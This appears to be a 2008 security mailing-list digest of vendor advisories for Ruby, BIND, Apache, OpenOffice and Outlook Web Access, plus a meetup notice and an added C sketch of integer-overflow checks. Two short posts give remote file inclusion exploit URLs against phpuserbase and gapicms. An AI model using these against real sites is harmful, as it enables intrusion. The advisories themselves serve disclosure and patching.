[ MDVSA-2008:140 ] - Updated ruby packages fix vulnerabilities
_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:140
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : ruby
 Date    : July 9, 2008
 Affected: 2008.1
_______________________________________________________________________

 Problem Description:

Multiple vulnerabilities have been found in the Ruby interpreter and in Webrick, the webserver bundled with Ruby.

Directory traversal vulnerability in WEBrick in Ruby 1.9.0 and earlier, when using NTFS or FAT filesystems, allows remote attackers to read arbitrary CGI files via a trailing (1) + (plus), (2) %2b (encoded plus), (3) . (dot), (4) %2e (encoded dot), or (5) %20 (encoded space) character in the URI, possibly related to the WEBrick::HTTPServlet::FileHandler and WEBrick::HTTPServer.new functionality and the :DocumentRoot option. (CVE-2008-1891)

Multiple integer overflows in the rb_str_buf_append function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors that trigger memory corruption. (CVE-2008-2662)

Multiple integer overflows in the rb_ary_store function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors. (CVE-2008-2663)

The rb_str_format function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption via unspecified vectors related to alloca. (CVE-2008-2664)

Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allows context-dependent attackers to trigger memory corruption via unspecified vectors, aka the REALLOC_N variant. (CVE-2008-2725)

Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption, aka the beg + rlen issue. (CVE-2008-2726)

Integer overflow in the rb_ary_fill function in array.c in Ruby before revision 17756 allows context-dependent attackers to cause a denial of service (crash) or possibly have unspecified other impact via a call to the Array#fill method with a start (aka beg) argument greater than ARY_MAX_SIZE. (CVE-2008-2376)

The updated packages have been patched to fix these issues.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1891
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2662
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2663
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2664
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2725
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2726
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2376
_______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.1
 Mandriva Linux 2008.1/X86_64
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

 http://www.mandriva.com/security/advisories

If y
[ MDVSA-2008:141 ] - Updated ruby packages fix vulnerabilities
_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:141
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : ruby
 Date    : July 9, 2008
 Affected: 2007.1, 2008.0, Corporate 4.0
_______________________________________________________________________

 Problem Description:

Multiple vulnerabilities have been found in the Ruby interpreter and in Webrick, the webserver bundled with Ruby.

Directory traversal vulnerability in WEBrick in Ruby 1.8 before 1.8.5-p115 and 1.8.6-p114, and 1.9 through 1.9.0-1, when running on systems that support backslash (\) path separators or case-insensitive file names, allows remote attackers to access arbitrary files via (1) ..%5c (encoded backslash) sequences or (2) filenames that match patterns in the :NondisclosureName option. (CVE-2008-1145)

Directory traversal vulnerability in WEBrick in Ruby 1.9.0 and earlier, when using NTFS or FAT filesystems, allows remote attackers to read arbitrary CGI files via a trailing (1) + (plus), (2) %2b (encoded plus), (3) . (dot), (4) %2e (encoded dot), or (5) %20 (encoded space) character in the URI, possibly related to the WEBrick::HTTPServlet::FileHandler and WEBrick::HTTPServer.new functionality and the :DocumentRoot option. (CVE-2008-1891)

Multiple integer overflows in the rb_str_buf_append function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors that trigger memory corruption. (CVE-2008-2662)

Multiple integer overflows in the rb_ary_store function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors. (CVE-2008-2663)

The rb_str_format function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption via unspecified vectors related to alloca. (CVE-2008-2664)

Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allows context-dependent attackers to trigger memory corruption via unspecified vectors, aka the REALLOC_N variant. (CVE-2008-2725)

Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption, aka the beg + rlen issue. (CVE-2008-2726)

Integer overflow in the rb_ary_fill function in array.c in Ruby before revision 17756 allows context-dependent attackers to cause a denial of service (crash) or possibly have unspecified other impact via a call to the Array#fill method with a start (aka beg) argument greater than ARY_MAX_SIZE. (CVE-2008-2376)

The updated packages have been patched to fix these issues.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1145
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1891
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2662
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2663
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2664
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2725
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2726
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2376
_______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2007.1
 Mandriva Linux 2007.1/X86_64
 Mandriva Linux 2008.0
London DEFCON July meet - DC4420 - Thursday 10th July (today!)
hey all,

it's that time of the month again! so we present to you:

DC4420 July @ the Glassblower! - Thursday July 10th

Talks
- Shell2VNC <-> VNC2Shell - Rich Smith & Alberto Revelli
- Network Intrusion Detection & Prevention with Snort - Leon
- Bluetooth stuff - Dominic (don't miss this - last chance to see etc)
- 5 minute slot - TBC

Please get in touch if you would like to talk at the late August/September meeting. Also, please get in touch with MM or me if you would like to talk at the Aug/Sept meeting, July is now full :-)

There will be workshops after the talks - please bring locks + picks if you have them (and are legally entitled to carry them!) :P

Where?

Upstairs @ Glassblower
http://maps.google.com/maps?f=q&hl=en&geocode=&q=W1B+5DL&ie=UTF8&ll=51.510625,-0.136878&spn=0.00629,0.021415&z=16&iwloc=addr
42 Glasshouse St, Piccadilly, W1B 5JY

doors open from 7, speaking starts from 7.30 - please try and be prompt as some people need to go early to get trains back out of London.

we have private use of the whole of the upstairs till close.

real ale on draught: Adnams Broadside + Spitfire, 'Buccomb' and 'Doombar'.
other stuff on draught: Guinness, Staropramen, Hoegaarden, Leffe.
even more stuff on draught: Becks, Fosters, 1664

food menu is extensive and most importantly: they do Pie.

as always, details & discussions here: http://dc4420.org

cheers,
//alien
[ GLSA 200807-06 ] Apache: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory             GLSA 200807-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Apache: Denial of Service
      Date: July 09, 2008
      Bugs: #222643, #227111
        ID: 200807-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Apache might lead to a Denial of Service.

Background
==========

The Apache HTTP server is one of the most popular web servers on the Internet.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  www-servers/apache        < 2.2.9                        >= 2.2.9

Description
===========

Multiple vulnerabilities have been discovered in Apache:

* Dustin Kirkland reported that the mod_ssl module can leak memory when the client reports support for a compression algorithm (CVE-2008-1678).

* Ryujiro Shibuya reported that the ap_proxy_http_process_response() function in the mod_proxy module does not limit the number of forwarded interim responses (CVE-2008-2364).

* sp3x of SecurityReason reported a Cross-Site Request Forgery vulnerability in the balancer-manager in the mod_proxy_balancer module (CVE-2007-6420).

Impact
======

A remote attacker could exploit these vulnerabilities by connecting to an Apache httpd, by causing an Apache proxy server to connect to a malicious server, or by enticing a balancer administrator to connect to a specially-crafted URL, resulting in a Denial of Service of the Apache daemon.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Apache users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-servers/apache-2.2.9"

References
==========

  [ 1 ] CVE-2007-6420
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6420
  [ 2 ] CVE-2008-1678
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1678
  [ 3 ] CVE-2008-2364
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2364

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
rPSA-2008-0223-1 poppler
rPath Security Advisory: 2008-0223-1
Published: 2008-07-09
Products:
    rPath Linux 2

Rating: Major
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    [EMAIL PROTECTED]:2/0.6.2-2-0.1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2649

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2950
    http://www.ocert.org/advisories/ocert-2008-007.html

Description:
    Previous versions of the poppler package contain a memory-management bug that may allow user-assisted attackers to execute arbitrary code using maliciously crafted PDF files.

    Note that applications linked against libpoppler may also be affected by this vulnerability, and will be fixed by this update.

http://wiki.rpath.com/Advisories:rPSA-2008-0223

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
phpuserbase 1.3 (menu) Remote File Inclusion Vulnerability
phpuserbase 1.3 (menu) Remote File Inclusion Vulnerability

[~] Found : Ghost Hacker [ R-H TeaM ]          |, .-. .-. ,|
[~] HOME  : www.Real-Hack.net                  | )(_o/ \o_)( |
[~] Email : [EMAIL PROTECTED]                  |/ /\ \|
[~] Script : phpuserbase 1.3
[~] Download Script : http://sourceforge.net/project/showfiles.php?group_id=200632

## [ I love the Messenger of Allah Mohammad ] ##

[~] Error ( phpUserBase_1_3_BETA/templates/default/header.inc.php )

[~] Exploit : http:///[path]/phpUserBase_1_3_BETA/templates/default/header.inc.php?menu=[Evil]

## [ I love the Messenger of Allah Mohammad ] ##

[~] Greetz : PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr .. Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ] All Member Real Hack And All My Friends ..

Real Hack Team ( R-H ) ..
[ GLSA 200807-07 ] NX: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory             GLSA 200807-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: NX: User-assisted execution of arbitrary code
      Date: July 09, 2008
      Bugs: #230147
        ID: 200807-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

NX uses code from the X.org X11 server which is prone to multiple vulnerabilities.

Background
==========

NoMachine's NX establishes remote connections to X11 desktops over small bandwidth links. NX and NX Node are the compression core libraries, whereas NX is used by FreeNX and NX Node by the binary-only NX servers.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  net-misc/nxnode           < 3.2.0-r3                  >= 3.2.0-r3
  2  net-misc/nx               < 3.2.0-r2                  >= 3.2.0-r2
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Multiple integer overflow and buffer overflow vulnerabilities have been discovered in the X.Org X server as shipped by NX and NX Node (GLSA 200806-07).

Impact
======

A remote attacker could exploit these vulnerabilities via unspecified vectors, leading to the execution of arbitrary code with the privileges of the user on the machine running the NX server.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All NX Node users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/nxnode-3.2.0-r3"

All NX users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/nx-3.2.0-r2"

References
==========

  [ 1 ] GLSA 200806-07
        http://www.gentoo.org/security/en/glsa/glsa-200806-07.xml

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability
## gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability ##

[~] Found : Ghost Hacker [ R-H TeaM ]          |, .-. .-. ,|
[~] HOME  : www.Real-Hack.net                  | )(_o/ \o_)( |
[~] Email : [EMAIL PROTECTED]                  |/ /\ \|
[~] Script : gapicms v9.0.2
[~] Download Script : http://heanet.dl.sourceforge.net/sourceforge/gapicms/gapicms_v9.0.2stable.tar.gz

# [ I love the Messenger of Allah Mohammad ] #

[~] Error ( ktmlpro/includes/ktedit/toolbar.php )

[~] Exploit : http:///[path]/ktmlpro/includes/ktedit/toolbar.php?dirDepth=[Evil]

# [ I love the Messenger of Allah Mohammad ]

[~] Greetz : PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr .. Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ] All Member Real Hack And All My Friends ..

## Real Hack Team ( R-H ) .. ##
Re: Microsoft DNS patch KB951748 incompatible with Zonealarm FIXED
All versions of ZoneAlarm have been updated and are ready for download here:

http://download.zonealarm.com/bin/free/pressReleases/2008/LossOfInternetAccessIssue.html

After installing the updates, you can move the security level to high once again. The new versions can be installed as updates or clean installs. Rebooting will be required.
Nessus plugins for recent MS Bulletins
We have released Nessus plugins for the recently published Microsoft bulletins. They can be downloaded at http://www.secpod.org/nessus-plugins/. These have been tested with Nessus 2.2.4 and released under the GPL. We'll continue to release these plugins under the GPL for upcoming threats.

Thanks,
Chandra.
[ MDVSA-2008:142 ] - Updated ruby packages fix vulnerabilities
_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:142
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : ruby
 Date    : July 9, 2008
 Affected: Corporate 3.0
_______________________________________________________________________

 Problem Description:

Multiple vulnerabilities have been found in the Ruby interpreter and in Webrick, the webserver bundled with Ruby.

Directory traversal vulnerability in WEBrick in Ruby 1.8 before 1.8.5-p115 and 1.8.6-p114, and 1.9 through 1.9.0-1, when running on systems that support backslash (\) path separators or case-insensitive file names, allows remote attackers to access arbitrary files via (1) ..%5c (encoded backslash) sequences or (2) filenames that match patterns in the :NondisclosureName option. (CVE-2008-1145)

Multiple integer overflows in the rb_str_buf_append function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors that trigger memory corruption, a different issue than CVE-2008-2663, CVE-2008-2664, and CVE-2008-2725. (CVE-2008-2662)

Multiple integer overflows in the rb_ary_store function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allow context-dependent attackers to execute arbitrary code or cause a denial of service via unknown vectors, a different issue than CVE-2008-2662, CVE-2008-2664, and CVE-2008-2725. (CVE-2008-2663)

The rb_str_format function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption via unspecified vectors related to alloca, a different issue than CVE-2008-2662, CVE-2008-2663, and CVE-2008-2725. (CVE-2008-2664)

Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, and 1.8.7 before 1.8.7-p22 allows context-dependent attackers to trigger memory corruption via unspecified vectors, aka the REALLOC_N variant, a different issue than CVE-2008-2662, CVE-2008-2663, and CVE-2008-2664. (CVE-2008-2725)

Integer overflow in the rb_ary_splice function in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2 allows context-dependent attackers to trigger memory corruption, aka the beg + rlen issue. (CVE-2008-2726)

Integer overflow in the rb_ary_fill function in array.c in Ruby before revision 17756 allows context-dependent attackers to cause a denial of service (crash) or possibly have unspecified other impact via a call to the Array#fill method with a start (aka beg) argument greater than ARY_MAX_SIZE. (CVE-2008-2376)

The updated packages have been patched to fix these issues.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1145
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2662
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2663
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2664
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2725
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2726
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2376
_______________________________________________________________________

 Updated Packages:

 Corporate 3.0
 Corporate 3.0/X86_64
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for secur
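The three Ruby advisories above (MDVSA-2008:140, 141 and 142) all list the rb_ary_splice "beg + rlen" overflow and the Array#fill case where beg alone exceeds ARY_MAX_SIZE. As an added illustration that is not Ruby's code or Mandriva's patch, the C below contrasts a bound check of the "compute the sum, then compare" shape, which wraps, with the subtraction form that cannot; ARY_MAX_SIZE here is a constructed stand-in for Ruby's constant, and the toy array and inputs are made up.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for Ruby's ARY_MAX_SIZE: the largest element count
 * whose byte size still fits in size_t. Not Ruby's exact definition. */
#define ARY_MAX_SIZE (SIZE_MAX / sizeof(void *))

typedef struct { void **ptr; size_t len; } toy_ary;   /* storage + elements in use */

/* Vulnerable shape (the advisory's "beg + rlen issue"): the new length is
 * computed first and only then compared. When beg + rlen exceeds SIZE_MAX the
 * sum wraps to a small number, the check passes, and storage would be resized
 * to that small length while the caller still writes at index beg. */
static bool new_len_naive(size_t beg, size_t rlen, size_t *out)
{
    size_t new_len = beg + rlen;                  /* may wrap around */
    if (new_len > ARY_MAX_SIZE) return false;
    *out = new_len;
    return true;
}

/* Hardened shape: bound each operand first, then compare by subtraction,
 * which cannot wrap once beg <= ARY_MAX_SIZE holds. */
static bool new_len_checked(size_t beg, size_t rlen, size_t *out)
{
    if (beg > ARY_MAX_SIZE) return false;         /* start index itself too large */
    if (rlen > ARY_MAX_SIZE - beg) return false;  /* beg + rlen would exceed the cap */
    *out = beg + rlen;                            /* provably no overflow here */
    return true;
}

/* Array#fill-style operation on the toy array: grow storage to beg + rlen and
 * store value into [beg, beg + rlen). 0 on success, -1 when rejected or out of
 * memory; the resize never uses an unchecked sum. */
static int toy_ary_fill(toy_ary *a, size_t beg, size_t rlen, void *value)
{
    size_t new_len;
    if (!new_len_checked(beg, rlen, &new_len)) return -1;
    if (new_len > a->len) {
        /* ARY_MAX_SIZE guarantees new_len * sizeof(void *) cannot overflow */
        void **p = realloc(a->ptr, new_len * sizeof(void *));
        if (p == NULL) return -1;
        memset(p + a->len, 0, (new_len - a->len) * sizeof(void *));
        a->ptr = p;
        a->len = new_len;
    }
    for (size_t i = beg; i < new_len; i++) a->ptr[i] = value;
    return 0;
}

/* Constructed input beg = SIZE_MAX - 3, rlen = 8: the naive sum wraps to 4 and
 * is accepted; returns that bogus length (0 if the check had rejected it). */
static size_t demo_naive_new_len(void)
{
    size_t n = 0;
    new_len_naive(SIZE_MAX - 3, 8, &n);
    return n;
}

/* The same request against the checked version is rejected. */
static bool demo_checked_accepts(void)
{
    size_t n = 0;
    return new_len_checked(SIZE_MAX - 3, 8, &n);
}

/* The CVE-2008-2376 shape: beg alone already exceeds ARY_MAX_SIZE. */
static bool demo_checked_rejects_huge_beg(void)
{
    size_t n = 0;
    return !new_len_checked(ARY_MAX_SIZE + 1, 0, &n);
}

/* Legitimate fill(2, 3) on an empty array: length 5, slots 0..1 left NULL. */
static size_t demo_fill_small(void)
{
    static int marker;
    toy_ary a = { NULL, 0 };
    if (toy_ary_fill(&a, 2, 3, &marker) != 0) return 0;
    bool ok = a.len == 5 && a.ptr[0] == NULL && a.ptr[1] == NULL &&
              a.ptr[2] == &marker && a.ptr[4] == &marker;
    size_t len = ok ? a.len : 0;
    free(a.ptr);
    return len;
}

/* The wrapping request through the hardened path: rejected before any realloc. */
static int demo_fill_wrapping_request(void)
{
    static int marker;
    toy_ary a = { NULL, 0 };
    return toy_ary_fill(&a, SIZE_MAX - 3, 8, &marker);
}

int main(void)
{
    printf("naive new_len for wrapping request: %zu\n", demo_naive_new_len());
    printf("checked version accepts it: %d\n", (int)demo_checked_accepts());
    printf("fill(2, 3) on an empty array gives len %zu\n", demo_fill_small());
    return 0;
}
```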
Context IS Advisory - MS08-39 OWA XSS
===ADVISORY===
Systems Affected: Microsoft Outlook Web Access 2003 and 2007 (Exchange Server 2003 SP2, Exchange Server 2007, Exchange Server 2007 SP1)
Severity: High
Category: Cross Site Scripting, Cross Site Request Forgery
Author: Context Information Security Ltd
Reported to vendor: 10th January 2008
Advisory Issued: 10th July 2008
===ADVISORY===

Description
-----------
Several Cross Site Scripting vulnerabilities were found within Outlook Web Access (OWA) 2003/2007. An attacker can craft a malicious email which will trigger within a user's browser. Different versions of OWA and different clients (Light and Premium) have different attack vectors, which can result in an attacker gaining *persistent* control over a victim's use of Outlook Web Access. An attacker would have full control of, and access to, the victim's e-mail account. This control could be further abused by utilising techniques such as JavaScript root-kits or web worms.

Analysis
--------
An attacker can craft a malicious email which contains the attack strings to compromise an OWA client. The user would only need to view the email to fall victim to the XSS attack.

Furthermore, persistent XSS can be gained by changing certain values within OWA to a particular XSS attack string. This string (consisting of HTML/JavaScript) is subsequently injected into *any* page which uses this value, including "new email" and "reply email" (for OWA 2003) and most pages (for OWA 2007). Logging out of the application and back in will not clear the attack.

Furthermore, the attack can be propagated by using the control over the OWA client to email the attack link to all users in the victim's inbox/contacts. At this point the attack would spread as an XSS worm (albeit one requiring the user to view the incoming email). This could potentially affect all users of the OWA application.

Technologies Affected
---------------------
Microsoft Exchange Server 2003
Microsoft Exchange Server 2007
Microsoft Exchange Server 2007 SP1

Vendor Response
---------------
On 9th July 2008, Microsoft issued security bulletin MS08-039 and an associated patch for Exchange Server 2003 and Exchange Server 2007 SP1.

Patches are available from:
http://www.microsoft.com/technet/security/bulletin/ms08-039.mspx

Context would recommend that these patches be installed as soon as practical on all Exchange Servers providing OWA functionality.

CVE
---
This issue has been assigned CVE numbers CVE-2008-2247 and CVE-2008-2248.

Disclosure Timeline
-------------------
10 January 2008 - Initial Discovery and vendor notification.
14th January 2008 - Vendor response requesting further details.
14th March 2008 - Vendor response requesting PoC. PoC provided.
9th July 2008 - Vendor advisory release.
10th July 2008 - Context Information Security Ltd advisory release.

Credits
-------
Michael Jordon of Context Information Security Ltd

About Context Information Security
----------------------------------
Context Information Security Limited is a specialist information security consultancy based in London and Frankfurt. Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialisms. Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority.

Web: www.contextis.co.uk
Email: [EMAIL PROTECTED]
[ MDVSA-2008:139 ] - Updated BIND packages fix critical DNS vulnerability
_______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:139
 http://www.mandriva.com/security/
_______________________________________________________________________

 Package : bind
 Date    : July 9, 2008
 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0
_______________________________________________________________________

 Problem Description:

A weakness was found in the DNS protocol by Dan Kaminsky. A remote attacker could exploit this weakness to spoof DNS entries and poison DNS caches. This could be used to misdirect users and services; i.e. for web and email traffic (CVE-2008-1447).

This update provides the latest stable BIND releases for all platforms except Corporate Server/Desktop 3.0 and MNF2, which have been patched to correct the issue.
_______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447
_______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2007.1
 Mandriva Linux 2007.1/X86_64
 Mandriva Linux 2008.0
 Mandriva Linux 2008.0/X86_64
 Mandriva Linux 2008.1
 Mandriva Linux 2008.1/X86_64
 Corporate 3.0
 Corporate 3.0/X86_64
 Corporate 4.0
 Corporate 4.0/X86_64
[ GLSA 200807-05 ] OpenOffice.org: User-assisted execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory             GLSA 200807-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: OpenOffice.org: User-assisted execution of arbitrary code
      Date: July 09, 2008
      Bugs: #225723
        ID: 200807-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An integer overflow vulnerability has been reported in OpenOffice.org.

Background
==========

OpenOffice.org is an open source office productivity suite, including word processing, spreadsheet, presentation, drawing, data charting, formula editing, and file conversion facilities.

Affected packages
=================

    -------------------------------------------------------------------
     Package                    /   Vulnerable   /         Unaffected
    -------------------------------------------------------------------
  1  app-office/openoffice          < 2.4.1                  >= 2.4.1
  2  app-office/openoffice-bin      < 2.4.1                  >= 2.4.1
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Sean Larsson (iDefense Labs) reported an integer overflow in the function rtl_allocateMemory() in the file sal/rtl/source/alloc_global.c.

Impact
======

A remote attacker could entice a user to open a specially crafted document, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All OpenOffice.org users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-office/openoffice-2.4.1"

All OpenOffice.org binary users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-office/openoffice-bin-2.4.1"

References
==========

  [ 1 ] CVE-2008-2152
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2152

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

